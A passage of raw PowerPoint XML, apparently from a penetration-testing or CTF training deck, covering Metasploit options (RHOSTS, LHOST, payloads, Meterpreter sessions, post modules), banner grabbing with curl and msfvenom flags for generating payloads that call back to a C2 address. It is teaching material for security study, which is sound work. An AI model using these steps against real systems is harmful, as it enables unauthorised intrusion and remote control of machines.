              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RHOSTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (for returned shell), and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LHOST can also use interface names, e.g. tun0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Default payload is usually Meterpreter, but most exploits can take a variety of payloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{564CF18B-945B-481C-BDAC-FC0251EE7093}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5868486" y="1607611"/>
            <a:ext cx="5868219" cy="543001"/>
            <a:chOff x="5910199" y="926498"/>
            <a:chExt cx="5868219" cy="543001"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Picture 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{212E32E7-7E0A-4063-BA1A-DE0B187D3001}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5910199" y="926498"/>
              <a:ext cx="5868219" cy="543001"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6C865C9-D413-42A2-B871-0C20D5BA9D93}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7973824" y="1106232"/>
              <a:ext cx="3804594" cy="166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9CDD95B-C0E3-44AB-A51F-26D3B65A64D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6049040" y="2379136"/>
            <a:ext cx="5507109" cy="3773372"/>
            <a:chOff x="6567515" y="1649233"/>
            <a:chExt cx="4553585" cy="3200847"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Picture 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1D9C310-8478-414A-BCA7-8ABD94880DCA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6567515" y="1649233"/>
              <a:ext cx="4553585" cy="3200847"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAE70321-F1BB-430A-A48D-5B3A25CEA9D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6829225" y="2301686"/>
              <a:ext cx="2903060" cy="153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1EA963-FB11-4482-9AFB-C2F7948B9AA4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6829225" y="4437418"/>
              <a:ext cx="2391508" cy="159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99958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54811C-8C8F-45EE-B10C-24208B295E68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>239</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{769819B4-D1C3-457A-AC21-4312771C3191}"/>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D3F6EB01-EC87-4880-985E-613F049BF13B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11155680" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once you get a callback, Metasploit can manage multiple sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sessions / sessions –I</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Meterpreter is a sold payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will show loaded module commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will spawn a shell process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36FD73F7-9147-4659-A144-2B7B45A617E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="31771"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="445770" y="4248150"/>
            <a:ext cx="6285509" cy="1647059"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D234975B-C5F6-4783-B774-5F97E544768A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="4342915"/>
            <a:ext cx="4839375" cy="1457528"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9814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70286-A0BD-42AB-ACD3-E5BA62EEB0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BB6243B-5DCB-4761-81CB-9B78D8E000A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Banner Grabbing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2936BC6-2ED3-42BD-A3BF-FBBF838C6DC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be used to grab the header information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May find server version or other useful information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Syntax: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl -I http[s]://[URL|IP]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For HTTPS in CTFs, add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--insecure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E55A26B-CD11-49D2-AC9A-7D1AA0A61E77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011798" y="3733800"/>
            <a:ext cx="5148002" cy="1887602"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{414B24D8-6539-4CCE-8AFD-E1EF38C698B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4320766" y="4990668"/>
            <a:ext cx="6946674" cy="1143864"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22648878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3BABC-8761-4715-8700-30D50FAB9BAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>240</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78E22C71-FDC7-4C88-B5D0-310B7F02AAC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit in Action</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B959949C-A9AE-4936-A422-942676CA9090}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11338560" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> modules can be used with existing sessions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1B378F7-14DE-48BE-8C11-8B7BD166D007}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="45058"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="275379" y="2071567"/>
            <a:ext cx="7739794" cy="3086578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9FD28F3-8BF3-427A-9F5E-E9A711723809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450807" y="2410319"/>
            <a:ext cx="5465814" cy="3651729"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBA7B3C2-B644-48DF-8FD5-305350D6EC83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3276600" y="2590800"/>
            <a:ext cx="3174207" cy="1552189"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="D12027"/>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5D7C064-6E72-4282-A18B-E00DCDB05D04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763001" y="3400386"/>
            <a:ext cx="990600" cy="153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9663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FBFBE-7A9E-4D90-92BF-CA2F9C440284}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>241</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6622BB0D-FBAC-4350-BCFA-5C38C08151F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FCF6D31-CCB3-405F-8A31-8C3BD4FAA9CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="6583680" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generate a variety of payloads and shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> flags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-a (architecture)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-p (payload type)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-e (encoding)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-f (output format)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-b (bad characters)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LHOST (C2 address)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LPORT (C2 port)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6269E084-F0F6-4020-A3AF-96401D70E880}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
